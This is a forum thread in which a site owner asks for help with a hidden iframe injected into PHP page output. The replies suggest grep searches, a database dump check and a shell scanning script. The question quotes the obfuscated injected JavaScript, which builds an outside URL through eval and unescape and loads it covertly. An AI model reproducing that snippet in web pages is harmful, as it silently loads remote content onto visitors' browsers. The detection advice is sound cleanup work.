
Help with odd PHP javascript/hidden iframe hack

Some pages on my site are including an unintended hidden iframe with some javascript in their output. I have read about sites getting hacked and similar code being added to php and html files before, but that is not quite the problem here, as none of my files actually contain the content that ends up in the output. I have no idea how this is happening. Is there some global php code that executes with each page load, or could it be at apache level? I'm at a loss.

Here is an example of what I'm seeing in the output:

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="7867" height="1" width="1"><img src="about:blank" onError='bvnnho=unescape("%27");fyvdmn=eval("document.getElementById("+bvnnho+"npelmp"+bvnnho+").src=unescape("+bvnnho+"%68%74%74%70%3A%2F%2F"+bvnnho+")+document.getElementById("+bvnnho+"7867"+bvnnho+").id+unescape("+bvnnho+"%2E%69%6E%2F"+bvnnho+")+"+bvnnho+"1299250012"+bvnnho+"+unescape("+bvnnho+"%2E%70%68%70"+bvnnho+")");document.getElementById("npelmp").src=fyvdmn' style="width:300;height:300;border:0px;"><iframe id="npelmp" src="about:blank"></iframe></div>

I have gone over my script very carefully and do not see how it could be outputting this. The reason I noticed it is that my script is used for writing a csv file, and an iframe--even hidden--sticks out like a sore thumb in a csv file. My web host says they haven't gotten any complaints from other users, so it must be my problem.

I have checked all my code (by hand and compared to my local copy), and I went through my database (which only contains integers anyway). I have found no sign of where this is coming from.

Oh, the other bit that makes this so hard to track down is that it is not present every time. So when I tried to show the host support, it wasn't there.

Has anyone seen this before? Or any idea of where else I can look?

Thanks...


If you have ssh access, you may just run

grep iframe ./ -Ri

(hint: hackers usually use hidden directories, named " " or stuff like that, that's probably why you don't find it)

If it fails, try to search the db, either with phpmyadmin or by dumping the raw content to a file and grepping it in the usual manner:

mysqldump -uUSERID -pPASSWORD DATABASENAME > mydump.sql
grep -i iframe mydump.sql


This is quite common.

Search all files for a string that looks like:

<?php eval(base64_decode("ZnVuY3Rpb24g...

This code might be in header.php file or some other .php file.

Please post back here with what you find.
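
A sweep combining the two answers above, as an added example that is not part of the original thread: it looks for `<iframe`, `eval(base64_decode(`-style loaders, and dot- or space-named directories. The `gzinflate`/`str_rot13` variants and the `auto_prepend_file`/`auto_append_file` check (PHP directives that run a file on every request) are additions beyond what the answers name; the function names and the script name are hypothetical.

```shell
#!/bin/sh
# Added example (not from the thread): sweep a web root for injection markers.
# Function names are hypothetical; patterns beyond "iframe" and
# "eval(base64_decode(" are additions and can be trimmed.

# Print file:line:marker for every hit. find (unlike a shell glob) descends
# into dot- and space-named directories, so hidden copies are covered too.
scan_markers() {
    find "$1" -type f \( -name '*.php' -o -name '*.inc' -o -name '*.htm*' \
        -o -name '*.js' -o -name '.htaccess' -o -name '.user.ini' \
        -o -name 'php.ini' \) \
        -exec grep -HnoiE \
            -e 'eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|str_rot13)' \
            -e '<iframe' \
            -e 'auto_(prepend|append)_file' \
            {} + || true   # grep exits 1 on "no match"; not an error here
}

# List directories whose names start with a dot or begin/end with a space,
# the kind of hiding place the first answer hints at. Expect legitimate hits
# such as .git or .well-known; review each one rather than deleting blindly.
odd_dirs() {
    find "$1" -mindepth 1 -type d \( -name '.*' -o -name ' *' -o -name '* ' \) -print
}

# Run both checks when a web root is given: sh scan.sh /path/to/webroot
if [ "$#" -gt 0 ]; then
    echo "== marker hits =="
    scan_markers "$1"
    echo "== unusual directory names =="
    odd_dirs "$1"
fi
```

Because `-o` prints only the matched marker, a long base64 blob on the same line does not flood the terminal; open the reported file and line to see the full statement.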


I realize this is an old post, but for readers with the same/similar problems, try scanning your site with http://sitecheck.sucuri.net/scanner/

Or use the following script: http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html (although it has the word WordPress, it also works on other websites)

Good Luck!
